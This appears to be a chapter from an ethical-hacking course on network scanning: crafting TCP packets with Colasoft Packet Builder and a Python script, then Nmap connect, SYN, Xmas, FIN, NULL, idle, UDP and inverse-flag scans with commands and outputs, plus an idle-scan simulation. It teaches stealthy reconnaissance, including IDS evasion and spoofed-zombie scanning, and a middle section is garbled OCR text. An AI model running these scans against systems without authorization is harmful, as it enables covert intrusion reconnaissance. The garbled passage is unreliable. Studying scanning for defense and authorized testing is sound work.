[Figure: the TCP Packet template selected in the Packet List (No. 1, Delta Time 0.100000, Source 0.0.0.0:0, Destination 0.0.0.0:0). The Decode Editor shows Packet Info (Packet Number, Packet Length, Captured Length, Delta Time 0.100000 Second), Ethernet Type II (Destination Address 00:00:00:00:00:00, Source Address 00:00:00:00:00:00, Protocol 0x0800) and IP - Internet Protocol (Version 4, Header Length 5 (20 bytes), Differentiated Services Field). The Hex Editor shows the zero-filled template, whose IP header starts 45 00 00 2E 00 00 40 00 40 06.]



5. When the packet is ready, click Send (selected packet) or Send All (every packet in the list). The Send All Packets dialog lets you choose the adapter and either Burst Mode (no delay between packets) or Loop Sending (a number of loops, zero for an infinite loop, with a Delay Between Loops in milliseconds), and reports Total Packets, Packets Sent and Progress while sending.

[Figure: Send All Packets dialog. Packets 1, Selected 1. Options: Adapter: Realtek PCIe GBE Family Controller; Burst Mode (no delay between packets); Loop Sending: N loops (zero for infinite loop); Delay Between Loops: 1000 milliseconds. Sending Information: Total Packets, Packets Sent, Progress; Start, Stop and Help buttons.]



6. Select Burst Mode and click Start to begin transmitting.

7. To keep the crafted packets, select them and choose Export on the toolbar or File > Export. The exported file can be loaded again later with Import, so a set of test packets only has to be built once.
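The seven steps above build one packet by hand in a GUI. The script below, an added example and not part of Colasoft Packet Builder, does the same in Python: it assembles an Ethernet/IPv4/TCP frame with any flag combination (a SYN, an Xmas tree packet with FIN/PSH/URG, and a NULL packet with no flags), computes the IP and TCP checksums, and writes the result as a pcap file that a packet builder or capture tool can import. The addresses, ports, sequence number and MSS are those of Frame 1 of the handshake capture above, so the SYN frame it produces can be compared byte for byte with that frame; the pcap file name is made up.

```python
# Building custom TCP frames with chosen flag combinations (what the Colasoft
# Packet Builder steps above do through the GUI) and saving them to a pcap
# file. Added example, not Colasoft code. MAC/IP addresses, ports and the
# sequence number come from Frame 1 of the handshake capture above so that the
# SYN frame built here can be compared with it; the pcap file name is made up.
import struct
import time

FLAG = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}
XMAS = FLAG["FIN"] | FLAG["PSH"] | FLAG["URG"]   # the "Christmas tree" combination
NULL = 0                                         # no flags at all


def checksum(data: bytes) -> int:
    """Internet checksum (RFC 1071): the value to store in the header field."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def _ip(text: str) -> bytes:
    return bytes(int(octet) for octet in text.split("."))


def build_frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, flags,
                seq=0, ack=0, window=8192, ip_id=0, ttl=128, mss=None) -> bytes:
    """Ethernet II + IPv4 + TCP header (no payload) with correct checksums."""
    options = struct.pack("!BBH", 2, 4, mss) if mss else b""   # MSS option, kind 2
    data_off = (20 + len(options)) // 4
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                      (data_off << 12) | flags, window, 0, 0) + options
    pseudo = _ip(src_ip) + _ip(dst_ip) + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), ip_id, 0x4000,
                     ttl, 6, 0, _ip(src_ip), _ip(dst_ip))         # 0x4000 = DF
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return _mac(dst_mac) + _mac(src_mac) + b"\x08\x00" + ip + tcp


def tcp_flags_of(frame: bytes) -> int:
    """Flag byte of a frame built by build_frame (Ethernet 14 + IP 20 + offset 13)."""
    return frame[14 + 20 + 13] & 0x3F


def pcap_bytes(frames, ts=0) -> bytes:
    """Classic libpcap file (link type 1 = Ethernet) holding the frames."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, fr in enumerate(frames):
        out += struct.pack("<IIII", ts + i, 0, len(fr), len(fr)) + fr
    return out


# NTW3 -> BDC3, the two hosts of the handshake capture above.
NTW3, BDC3 = "131.107.2.214", "131.107.2.211"
NTW3_MAC, BDC3_MAC = "02:60:8C:3B:85:C1", "02:60:8C:9E:18:8B"


def syn_frame() -> bytes:
    """Rebuilds Frame 1 exactly: seq, IP ID, window and MSS as captured."""
    return build_frame(NTW3_MAC, BDC3_MAC, NTW3, BDC3, 1037, 139, FLAG["SYN"],
                       seq=8221822, window=8192, ip_id=0x0D01, mss=1460)


def xmas_frame() -> bytes:
    return build_frame(NTW3_MAC, BDC3_MAC, NTW3, BDC3, 1037, 139, XMAS, ip_id=0x0D02)


def null_frame() -> bytes:
    return build_frame(NTW3_MAC, BDC3_MAC, NTW3, BDC3, 1037, 139, NULL, ip_id=0x0D03)


# Frame 1 from the page's hex dump, without its two bytes of Ethernet padding.
PAGE_FRAME1 = bytes.fromhex(
    "02 60 8C 9E 18 8B 02 60 8C 3B 85 C1 08 00 45 00 "
    "00 2C 0D 01 40 00 80 06 E1 4B 83 6B 02 D6 83 6B "
    "02 D3 04 0D 00 8B 00 7D 74 7E 00 00 00 00 60 02 "
    "20 00 F2 13 00 00 02 04 05 B4")

if __name__ == "__main__":
    print("SYN frame matches Frame 1:", syn_frame() == PAGE_FRAME1)
    with open("custom_flags.pcap", "wb") as f:      # file name is an assumption
        f.write(pcap_bytes([syn_frame(), xmas_frame(), null_frame()], int(time.time())))
```

The frames are built without the Ethernet padding a driver adds to reach the 60-byte minimum, which is why the comparison is against Frame 1 minus its trailing two bytes. Transmitting the pcap still needs a raw-socket tool or a builder such as the one above; building the bytes needs no privileges.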



Scanning IPv6 networks

IPv6 enlarges the address from 32 to 128 bits, and a single subnet has a 64-bit host part, i.e. 2^64 possible addresses. Sweeping such a range host by host, as a ping sweep does on an IPv4 /24, is computationally out of reach, and some scanning tools (Nmap's ping sweep among them) do not support sweeping IPv6 networks at all. Scanning IPv6 is therefore harder than scanning IPv4: an attacker first has to collect candidate IPv6 addresses from other sources, such as captured network traffic, logs, and the Received: and other header lines of archived e-mail or news messages, and only then port-scans those specific hosts.

NMAP

Source: http://nmap.org

Nmap (Network Mapper) is a free, open-source tool for network discovery and security auditing. It sends raw IP packets and analyses the replies to determine which hosts are up on the network, which services (application name and version) they offer, which operating systems they run, what kind of packet filters or firewalls sit in front of them, and other characteristics. It runs on Linux, Windows and Mac OS X and behaves the same way on each of them.

Scan techniques it supports (the ones covered below):

TCP Connect / Full Open Scan
Stealth Scans: SYN Scan (Half-open Scan); XMAS Scan, FIN Scan, NULL Scan
IDLE Scan
ICMP Echo Scanning/List Scan
SYN/FIN Scanning Using IP Fragments
UDP Scanning
Inverse TCP Flag Scanning
ACK Flag Scanning

For the assignment of port numbers to services see List of TCP and UDP port numbers:
http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers

Nmap is run from the command line (a terminal on Linux, the command prompt on Windows) as the nmap command. It also ships with Zenmap, a graphical front end that builds the same command lines and shows the results in tabs; either one is started by typing nmap or zenmap.

In its simplest form nmap is given nothing but the target, an IP address or a host name:

nmap 173.194.39.17

Starting Nmap 6.40 ( http://nmap.org ) at 2014-03-20 22:10 EDT
Nmap scan report for ham02s13-in-f17.1e100.net (173.194.39.17)
Host is up (0.21s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
25/tcp  open  smtp
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 20.20 seconds

Without options Nmap probes its default list of the 1000 most common TCP ports; here 997 of them were filtered (no reply) and three answered. The run above was made on Linux; the same target scanned from Zenmap on Windows with the Intense scan profile looks as follows.



[Figure: Zenmap window. Target: 173.194.39.17; Profile: Intense scan; Command: nmap -T4 -A -v 173.194.39.17; left panel Hosts / Services; tabs Nmap Output, Ports / Hosts, Topology, Host Details, Scans. The Nmap Output tab shows:]

Starting Nmap 6.40 ( http://nmap.org ) at 2014-03-21 04:14 Egypt Standard Time
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
Initiating Ping Scan at 04:14
Scanning 173.194.39.17 [4 ports]
Completed Ping Scan at 04:14, 0.94s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:14
Completed Parallel DNS resolution of 1 host. at 04:14, 5.59s elapsed
Initiating SYN Stealth Scan at 04:14
Scanning ham02s13-in-f17.1e100.net (173.194.39.17) [1000 ports]
Discovered open port 80/tcp on 173.194.39.17
Discovered open port 25/tcp on 173.194.39.17
Discovered open port 443/tcp on 173.194.39.17
SYN Stealth Scan Timing: About 1... (0:01:06 remaining)
Completed SYN Stealth Scan at 04:15 (1000 total ports)
Initiating Service scan at 04:15
Scanning 3 services on ham02s13-in-f17.1e100.net (173.194.39.17)
Completed Service scan at 04:16, 41.28s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against ham02s13-in-f17.1e100.net (173.194.39.17)
Retrying OS detection (try #2) against ham02s13-in-f17.1e100.net (173.194.39.17)
Initiating Traceroute at 04:16
Completed Traceroute at 04:16, 0.18s elapsed
Initiating Parallel DNS resolution of 3 hosts. at 04:16
Completed Parallel DNS resolution of 3 hosts. at 04:16



In Zenmap you enter the IP address or host name in Target, choose the kind of scan in Profile, and click Scan. The output appears in the tabs on the right (Nmap Output, Ports / Hosts, Topology, Host Details, Scans), and the panel on the left lists what was found (Hosts, Services). The Profile box offers a set of ready-made scan types and, for each of them, shows the actual nmap command it generates in the Command field, which is a good way to learn which options produce which scan. To define your own scan, open Profile > New Profile or Command; this starts the Profile Editor, and every option you tick there is added to the nmap command line shown at the top of the editor.



[Figure: Zenmap Profile menu with New Profile or Command (Ctrl+P) and Edit Selected Profile (Ctrl+E); below it the Profile Editor with the command nmap -T4 -A -v 173.194.39.17 and the tabs Profile, Scan, Ping, Scripting, Target, Source, Other, Timing. The Profile tab holds Profile Information (Profile name, Description); the help pane reads "The description is a full description of what the scan does, which may be long."]

Then, in the Scan tab, choose the scan types and options the profile should run, for example:



[Figure: Profile Editor, Scan tab. Command: nmap -sA -sU -T4 -A -v 173.194.39.17. Scan options: Targets (optional); TCP scan: ACK scan (-sA); Non-TCP scans: UDP scan (-sU); Timing template: Aggressive (-T4); [x] Enable all advanced/aggressive options (-A); [ ] Operating system detection (-O); [ ] Version detection (-sV); [ ] Idle Scan (Zombie) (-sI); [ ] FTP bounce attack (-b); [ ] Disable reverse DNS resolution (-n); [ ] IPv6 support (-6). Help pane: "IPv6 support: Enable IPv6 scanning." Buttons: Cancel, Save Changes.]

Click Save Changes and then Scan to run the new profile. The rest of this section goes through each scan type, what it does and how to run it from the command line.

Using Nrnap to Perform a TCP Connect Scan\Full Open Scan ■ 

^Kiail! ^j^l liA jl c_uuij .(Nmap)^Vl yi ^^31 iaUJI J£ ^ Three way handshake J^j J j^Nmap ^ j 
.(crashed) ^Uajll ^ ^ c^j^ <lMj J-^VI <jlij ^ Three way handshake ^iLc ^ <-U*j 
4il£ (j^ai Ixjb ^jjudaJLouJI ^ , (1000 port)^- j^ 1 iaUxJI ^aaij l_a jjui Nmap tisLLall (j;!*-* (jUaj aj^jj lit 

^1,^ lull Ljajl ^^-^a JJ .Nmap lS^*-*^ i ^ c - " -p- " L^J^ 3 Cf 0 ^^3^ ^-lAa. (j-^aai <aJ _^jJa! jjaVI/^^juAjS J^*3^ lA^ild ^^Jc 

Nmap (hosts discovery) u j^J ' ^^ JjL*j ^ " -p n " ^^1^ .Nmap " -Pn " l^.^ 

:>tljSri jkyi <^ ^UJI (TCP Connect Scan) u^il) (> ^jSM 4**2S1 



#nmap©-sT©-p-©-Pn©192.168.18.132 



o- 2 ^^ nmap jW^-V (-s) ^ 



.Nmap (_3j-^^ ^1.^ nnb ial_L<JI <j-*aai ^ ^aJI j^^jII b^ ^Vimj Nmap 
TCP Connect Scan c> ^I^L nmap jW^ ^ e^ 1 ^ -sT 
.TCP Connect Scan J\ t > ( T ) e^^J 6 ^ 
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^UaiSl L5 ic Ajjal\ gjA'S (Jr^i^ql ^AikJjuaJ -J). 

^1 ^1) Ja«JI 6 jLSI ^Paxj V gjil! £^ t^Jij live host discovery ajj^U. ^ v^ .. n -Pn 

.IP jljk, d& Axj ^ .(PING J-bU «.n^..n V 

[nmap©-sT©-p-©-Pn©192.168.18.1-254] ^Vl Ji* IP ojj^ c> JU* j\ jIPjl> Ua 
^ .^L o^UJ! Nmap j-bU "-iL©path_to_the_text_file " ^ ja^\ *iLiL fi ^ J>** t> >-i^Jl 

.^Ij ^al Igj^lLujJ ^iiijJaxJl (j^a^Aj till 

-iatUI LiLuu£l ^5 nmap >*Vt S jia 
(Three way handshakes) jilUI 4JU ■ 

nmap J^J^ c> jW lUjj . Three way handshakes^ q^JW IIa 

t ^12! jl^JI ^ jj ^(TCP SESSION)TCP 64*- ^ OSI MODEL Jl c> W ^ ^ (^ jj^ 

^ CjjjJI jl (nmap) j-^jJl ^j*-?. j RST ^ (j^j^ 3 Jb-^VI j^-g-Sl 'j^' j 6 c j-^' ^—uj^ 

(vanilla scanning) iHa^M SUaI) 4JU <^ ■ 



^ Scan result when a port fs ppen ^ 



m+mi„„„ 



Attacker 



Target 



result when a port is tlgsed 



SVN facket + Port jn] 
RST 



Attacker 



Target 



.(log file) J?-« J 



root@jana:~# nmap -sT -p- -Pn 192.168.16.70

Starting Nmap 6.40 ( http://nmap.org ) at 2014-03-21 00:11 EDT
Nmap scan report for 192.168.16.70
Host is up (0.0062s latency).
Not shown: 65524 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
554/tcp   open  rtsp
902/tcp   open  iss-realsecure
912/tcp   open  apex-mesh
2869/tcp  open  icslap
5357/tcp  open  wsdapi
10243/tcp open  unknown
49155/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 105.92 seconds















Using Nmap to Perform a SYN Scan (Stealth Scan / Half-open Scan)

The SYN scan is Nmap's default scan type: it is what you get when nmap is run without a -s option, provided Nmap has the privileges to send raw packets. It is faster than the TCP connect scan and far less likely to crash or DoS the target system, because the connection is never fully established; the scan completes only the first two steps of the three-way handshake.

In a SYN scan, Nmap sends a SYN to the port. If the port is open the target answers SYN/ACK, exactly as in the connect scan, but instead of completing the handshake with an ACK, Nmap sends RST and aborts the half-open connection. If the port is closed the target answers the SYN with RST. Because the handshake is never completed, the application listening on the port never sees the connection and does not log it, and the load on the target is lower than with a full connect scan.

[Figure: Port is open: Bill (10.0.0.2:2342) sends SYN (port 80) to Sheela (10.0.0.3:80), Sheela replies SYN+ACK, Bill sends RST. Port is closed: Bill sends SYN, Sheela replies RST.]

If the three-way handshake is a phone call that is picked up, the SYN scan is dialling, hearing the answering machine start, and hanging up before the call connects: the other side knows someone called, but no conversation was recorded.

The SYN scan is often called the stealth scan because it is not noticed as easily. Stealth has a precise meaning here: the target's log file records no connection, because no connection was ever established. Older logging and IDS setups that only record completed connections therefore miss it entirely; modern firewalls and intrusion detection systems that inspect the packets themselves do see the SYN/RST exchange and flag the scan, so the scan is quieter than a connect scan, not invisible.

It is Nmap's default when the scan type (-s) is omitted because it is fast, works against any TCP/IP stack and is relatively unobtrusive.

To run a SYN scan, type the following at the terminal or command prompt:

nmap -sS -p- -Pn 192.168.18.132

Here -sS selects the SYN scan, in the same way -sT selected the TCP connect scan; -p- and -Pn keep their meaning from the previous example.

This is the scan to prefer whenever nmap runs with root or administrator rights, since crafting the raw SYN and RST packets requires privileged access. It never completes a connection, so it leaves no entries in the target's application logs and is less likely to trip an IDS than a connect scan, while giving equally accurate results.

(This type of scan needs privileged access: -sS)
Using Nmap to Perform an Xmas Scan

Before looking at this scan, a word about RFCs. A Request for Comments (RFC) is a document published by the Internet Engineering Task Force (IETF) that specifies how a protocol or some other part of the Internet is supposed to work, and the TCP/IP stacks in operating systems are written to follow them. Because the RFCs spell out exactly how a stack must react to each kind of packet, an attacker can turn those rules around and use them to learn the state of a port; Xmas tree scans and null scans both work this way.

An Xmas tree scan sends a TCP packet with the FIN, PSH and URG flags all set (the flag bits are "lit up like a Christmas tree"). Such a packet makes no sense in a normal TCP exchange and nothing in the three-way handshake describes it, but RFC 793 (the TCP specification) does say how a port must treat a segment that belongs to no existing connection: if the port is closed and the incoming segment does not carry RST, the host sends RST; if the port is open and the segment carries none of SYN, RST or ACK, the segment is dropped and nothing is sent. An Xmas tree packet therefore draws an RST from a closed port and silence from an open one.

[Figure: Attacker (10.0.0.6) sends a FIN/PSH/URG packet to the target. No response means the port is open; RST means the port is closed.]

This only works against operating systems whose TCP/IP stack implements RFC 793 as written (UNIX, Linux and the BSD derivatives do); Nmap infers an open port from the absence of a reply. Microsoft Windows does not follow the RFC on this point and answers every such probe with RST whatever the state of the port, so against Windows the Xmas tree and null scans report every port closed and are useless.

To run an Xmas tree scan, set the scan type to X (-sX):

nmap -sX -p- -Pn 192.168.18.132

The scan never opens a connection, so nothing is written to the target's logs, although an IDS may still detect it. It needs privileged access, and it does not work against Windows systems.

Using Nmap to Perform a FIN Scan

A FIN scan uses the same RFC 793 rules with a probe that carries only the FIN flag. A closed port answers RST; an open port drops the packet and stays silent, which Nmap reports as open. Like the Xmas scan it needs privileged access and does not work against Windows.

nmap -sF -p- -Pn 192.168.18.132
Using Nmap to Perform Null Scans

A null scan, like the Xmas tree scan, is built on the RFC 793 rules for segments that belong to no connection; the difference is that the null scan sends a TCP packet with no flags set at all. The reply is read the same way as for the Xmas tree scan: an open port on an RFC-compliant stack discards the packet and sends nothing, a closed port answers RST/ACK. Again this relies on the target implementing the TCP RFC faithfully.

One reason both scans exist is to get past simple packet filters and firewalls. Many such filters look only for SYN packets, because a SYN is the normal first packet of the three-way handshake and blocking it is the obvious way to stop new connections to a protected port. A probe that carries FIN, PSH and URG, or no flags at all, is not a connection attempt in the filter's eyes and may pass through to the host behind it, where the RFC behaviour reveals whether the port is listening.

[Figure: Attacker (10.0.0.6) sends a TCP packet with no flags set to Server (10.0.0.8:23). No response: port is open. RST/ACK: port is closed.]

A typical situation: you scan a network and the TCP connect scan reports every port filtered, because a packet filter in front of the hosts only admits SYN packets to a few services. The next steps are the UDP scan, the Xmas tree scan and the null scan (Nmap option -sN), which may slip past the filter and give a different picture.

As with the Xmas scan, no connection is ever completed, so the target's logs stay empty, but an IDS can still notice the malformed probes. The scan needs privileged access and does not work against Windows systems.

IDLE Scan

What is an idle scan? It is a port scan in which the attacker never sends a packet to the target from its own IP address. Every probe that reaches the target carries the spoofed address of a third machine, the "zombie", and the attacker learns the result through a side channel on the zombie: the IP ID field of the packets the zombie sends. The target sees only the zombie's address, so the attacker stays out of the target's logs and IDS alerts.

The scan depends on three facts about TCP/IP:

- A SYN sent to an open port draws SYN/ACK; a SYN sent to a closed port draws RST.
- A host that receives an unsolicited SYN/ACK (one it did not ask for) answers with RST; a host that receives an unsolicited RST ignores it.
- Every IP packet carries a 16-bit Identification number (the IP ID, or fragment identifier), and on many systems the stack simply increments one global counter for every packet it sends. By probing a host and reading the IP ID of its reply, you can tell how many packets it has sent since your previous probe.

A host whose IP ID behaves this way and which sends no traffic of its own is a suitable zombie; such an "idle" machine is what gives the scan its name.

The steps to scan one port are:

1. Probe the zombie's IP ID. The attacker sends a SYN/ACK to the zombie; the zombie did not expect it and answers RST, and that RST carries its current IP ID, say 31337.

[Figure: Attacker sends an IPID probe (SYN/ACK packet) to the Zombie; the Zombie responds with an RST packet, IPID = 31337.]

2. Forge a SYN from the zombie. The attacker sends a SYN to the target port (port 80 in the figure) with the zombie's IP address as the source, so the target replies to the zombie, not to the attacker. If the port is open, the target sends SYN/ACK to the zombie, which was not expecting it and answers RST, incrementing its IP ID (to 31338). If the port is closed, the target sends RST to the zombie, which ignores it, and the zombie's IP ID does not move.

[Figure: Attacker sends a SYN packet to port 80 spoofing the zombie's IP address. Port is open: Target sends SYN/ACK to the Zombie and the Zombie answers RST. Port is closed: Target sends RST to the Zombie, which ignores it.]

3. Probe the zombie's IP ID again, exactly as in step 1. The zombie's reply now carries IP ID 31339 if the port was open (two packets sent since step 1: the RST of step 2 and this reply) or 31338 if it was closed (only this reply).

[Figure: Attacker sends the IPID probe (SYN/ACK packet) again; the Zombie responds RST with IPID = 31339: "IPID incremented by 2 since step 1, so port 80 must be open".]

Reading the result: the IP ID from step 3 minus the IP ID from step 1 is either 1 or 2. An increment of 2 means the target answered the zombie with SYN/ACK, so the port is open (the 31337 to 31339 case in the figures). An increment of 1 means the zombie sent nothing in between: either the target replied RST because the port was closed, or a firewall dropped the forged SYN. An idle scan therefore cannot tell a closed port from a filtered one; both show up as an increment of 1. Any larger value means the zombie was not idle (it was sending traffic of its own during the scan) and the measurement is unreliable, which is why the zombie must be chosen with care.

[Figure: the same three steps drawn with a zombie whose IP ID goes from 44501 to 44502: the Attacker, the Zombie (the idle machine) and the Target.]

With Nmap an idle scan is run with -sI followed by the zombie, then the target:

nmap -Pn -sI idle.device.com www.target.com
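The three steps above, with both sides of every exchange, as an added simulation in Python (not Nmap's implementation): an attacker, a zombie whose IP ID is one global counter, and a target with an open, a closed and a filtered port. The addresses, the port table and the starting IP ID (chosen so that the probes return the 31337 and 31339 values in the figures) are constructed; the extra_traffic setting shows what happens when the zombie is not idle.

```python
# Simulation of the idle scan: attacker, zombie with a global incrementing
# IP ID, and a target with open/closed/filtered ports. The attacker never
# sends a packet of its own to the target.
# Added example; hosts, ports and the starting IP ID are constructed.
from typing import Dict, Optional

Packet = Dict[str, object]   # keys: src, dst, flags, dport, ip_id


class Zombie:
    """Idle host: every packet it sends carries the next IP ID."""

    def __init__(self, ip: str, ip_id: int = 31336, extra_traffic: int = 0):
        self.ip, self.ip_id, self.extra_traffic = ip, ip_id, extra_traffic

    def _send(self, dst: str, flags: str) -> Packet:
        self.ip_id += 1
        return {"src": self.ip, "dst": dst, "flags": flags, "dport": 0, "ip_id": self.ip_id}

    def receive(self, pkt: Packet) -> Optional[Packet]:
        # An unsolicited SYN/ACK is answered with RST; an unsolicited RST is ignored.
        return self._send(pkt["src"], "RST") if pkt["flags"] == "SYN/ACK" else None

    def tick(self) -> None:
        # Packets the zombie sends to other hosts between our probes (a non-idle zombie).
        for _ in range(self.extra_traffic):
            self._send("other", "ACK")


class Target:
    def __init__(self, ip: str, ports: Dict[int, str]):
        self.ip, self.ports = ip, ports

    def receive(self, pkt: Packet) -> Optional[Packet]:
        if pkt["flags"] != "SYN":
            return None                      # stray RSTs are ignored
        state = self.ports.get(pkt["dport"], "closed")
        if state == "filtered":
            return None                      # firewall drops the probe
        flags = "SYN/ACK" if state == "open" else "RST"
        return {"src": self.ip, "dst": pkt["src"], "flags": flags, "dport": 0, "ip_id": 0}

    def tick(self) -> None:
        pass


class Network:
    def __init__(self, *hosts):
        self.hosts = {h.ip: h for h in hosts}

    def send(self, pkt: Packet, listener: str) -> Optional[Packet]:
        """Deliver pkt, follow the chain of replies, return the one that reaches listener."""
        reply = None
        while pkt is not None and pkt["dst"] in self.hosts:
            pkt = self.hosts[pkt["dst"]].receive(pkt)
            if pkt is not None and pkt["dst"] == listener:
                reply = pkt
                break
        for host in self.hosts.values():
            host.tick()
        return reply


def idle_scan(net: Network, attacker: str, zombie: str, target: str, port: int):
    """Returns (verdict, zombie IP ID at step 1, zombie IP ID at step 3)."""
    probe = {"src": attacker, "dst": zombie, "flags": "SYN/ACK", "dport": 0, "ip_id": 0}
    before = net.send(probe, attacker)["ip_id"]                    # step 1
    spoofed = {"src": zombie, "dst": target, "flags": "SYN", "dport": port, "ip_id": 0}
    net.send(spoofed, attacker)                                    # step 2: replies go to the zombie
    after = net.send(dict(probe), attacker)["ip_id"]               # step 3
    verdict = {1: "closed|filtered", 2: "open"}.get(after - before, "unreliable (zombie not idle)")
    return verdict, before, after


def run(port: int, extra_traffic: int = 0):
    """Fresh attacker/zombie/target setup; the port table is constructed."""
    net = Network(Zombie("10.0.0.9", extra_traffic=extra_traffic),
                  Target("10.0.0.3", {80: "open", 22: "closed", 443: "filtered"}))
    return idle_scan(net, "10.0.0.6", "10.0.0.9", "10.0.0.3", port)


if __name__ == "__main__":
    for port in (80, 22, 443):
        print("port %d:" % port, run(port))
    print("busy zombie, port 80:", run(80, extra_traffic=1))
```

Port 22 (closed) and port 443 (filtered) give the same answer, which is the limitation stated above; with a zombie that sends one packet of its own between probes the increments become meaningless, which is why Nmap's -sI wants a genuinely idle host.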



ICMP Echo Scanning / List Scan

ICMP echo scanning is not a port scan at all: it only establishes whether a host is alive. The scanner sends an ICMP Echo Request to each address; a host that is up answers with an ICMP Echo Reply, and an address that stays silent is either unused or belongs to a host whose firewall blocks ICMP. It is the quickest way to find which devices on a network are live before any port scanning, and it shows whether ICMP is allowed through the firewall.

ICMP echo scanning differs from an ordinary ping sweep in how the requests are sent. On UNIX/Linux and BSD-based TCP/IP stacks, a single ICMP Echo Request sent to the network's broadcast address makes every live host on the segment answer, so the whole network is found with one packet; Windows hosts do not answer Echo Requests sent to a broadcast address, so they have to be pinged one by one.

Because ICMP echo never touches a port, it says nothing about which services are open; it is only used to discover live hosts. In Nmap the ping-only scan is:

nmap -sP 192.168.219.0/24

(-sP is the ping scan; in current Nmap releases the same scan is spelled -sn and -sP remains as an alias.)

List scan: the list scan is the most harmless of all Nmap's scans. It simply lists the IP addresses or host names of the targets, doing a reverse-DNS lookup for each, without sending a single probe to them; every host is reported as "not scanned" and the summary says 0 hosts up. Use it to check that a target specification (a range, a CIDR block, a file of hosts) expands to the addresses you intended, and to see the names of the targets, before starting a scan that does generate traffic.
Using Nmap to Perform UDP Scans

One of the most common mistakes in port scanning is to forget UDP. Many people think of port scanning purely in terms of TCP; both the TCP connect scan and the SYN scan use TCP packets, and neither of them will find a UDP service. Yet many important services listen on UDP, and the two protocols behave so differently that they need different scanning methods.

TCP is a connection-oriented protocol: the three-way handshake makes sure both sides are in sync before data flows, every segment is acknowledged, and lost segments are retransmitted. It is like a phone call, where each side knows the other is listening. UDP is connectionless: the sender simply fires a datagram at the receiver with no handshake, no acknowledgement and no guarantee of delivery, and the receiver is under no obligation to answer. It is like dropping a letter into a mailbox: you trust the postal system to deliver it, and you only learn otherwise if someone tells you.

Both are transport protocols, and the services on a host may use either one. Services that typically use UDP include DHCP, DNS (most lookups), SNMP and TFTP, as well as streaming and other real-time traffic that prefers speed to reliability. Ignoring UDP means missing all of these.

Because the TCP connect and SYN scans are TCP-specific, Nmap has a separate UDP scan, selected with -sU, run here against the same target as the previous examples:

nmap -sU 192.168.18.132

Note that -p- and -Pn have been left out of this command. UDP scanning is slow: even the default 1000 ports take a long time, and scanning all 65535 UDP ports can take many hours, for the reason explained below.

[Figure: Attacker sends a UDP datagram ("Are you open on UDP port N?") to the Server. No response if the port is open; if the port is closed an ICMP Port Unreachable message is received.]

UDP has no SYN/ACK or RST to read, so the UDP scan relies on ICMP instead. When a UDP datagram arrives at a closed port, the target's stack answers with an ICMP Port Unreachable message and Nmap marks the port closed. When the port is open, the listening service receives the datagram, but an empty probe usually means nothing to it, so it sends nothing back; silence is also exactly what a firewall produces when it drops the probe. Nmap therefore reports such ports as "open|filtered": from the absence of a reply it cannot tell whether a service is listening or a filter ate the packet. Only when a service happens to answer the probe is the port marked open outright.

The slowness comes from rate limiting of those ICMP errors. Since Linux kernel 2.4.20 the stack limits ICMP Port Unreachable messages to one per second (net/ipv4/icmp.c), and other systems impose similar limits. Nmap detects the limit and slows down to match, so a scan of all 65535 UDP ports against such a host takes about 65535 seconds, over 18 hours. Nmap shortens this where it can (it sends protocol-specific payloads to the most common UDP ports so that services answer instead of staying silent), but a full UDP scan remains a long job.

To get more accurate results for UDP, add version detection, -sV, to the UDP scan. Nmap then sends protocol-specific probes to each port reported open|filtered and, when a service answers, moves the port to open and names the service; ports that stay silent remain open|filtered. This costs extra time and the probes are chattier, so the scan is easier to notice, but the result is a far better picture of what really listens on UDP than the plain -sU scan gives.
Using Nmap to Perform Inverse TCP Flag Scan

The attacker sends TCP probe packets that carry one of the flags FIN, URG or PSH, or no flag at all, instead of SYN. If the port is open the target sends nothing back; if it is closed the target answers RST/ACK. Open ports are thus recognised by the absence of a reply, which is why the technique is called inverse.

Why avoid SYN? A SYN probe is the first step of a real connection: a closed port answers it with RST/ACK and an open port with SYN/ACK, so it is easy to detect and to log, and tools such as Synlogger and Courtney exist specifically to spot SYN scans. Packets that carry other flags do not start a connection, so they slip past filters and logging that only watch for SYN, and the target's applications never see them. Firewalls and IDSs with stateful inspection, however, do notice TCP segments that belong to no connection.

The behaviour used is the one RFC 793 prescribes for a segment that belongs to no connection: a closed port replies RST/ACK to anything that is not itself an RST, and an open port drops a segment that has none of SYN, RST or ACK. The probes built on this rule are:

- TCP FIN: only the FIN flag set.
- TCP XMAS: FIN, URG and PUSH set together.
- TCP NULL: no flags set.
- SYN/ACK: SYN and ACK set, as if answering a handshake the target never started.

In every case a closed port answers RST/ACK and an open port answers nothing.

Advantages: the probes avoid many IDS and logging setups, and no connection is ever established, so nothing appears in the target's log file. Disadvantages: the scan needs raw packet crafting and therefore privileged access, and it only works against stacks that implement RFC 793 faithfully. Microsoft Windows and some other systems answer RST/ACK whatever the state of the port, so against them every port looks closed; and because "open" is inferred from silence, a port that a firewall filters looks open too.

[Figure 3.37: Inverse TCP Flag Scanning when Port is Open: Attacker sends a probe packet (FIN/URG/PSH/NULL) to the Target Host; no response, port is open. Figure 3.38: Inverse TCP Flag Scanning when Port is Closed: Attacker sends a probe packet (FIN/URG/PSH/NULL); the Target Host replies RST/ACK, port is closed.]



ACK Flag Scanning

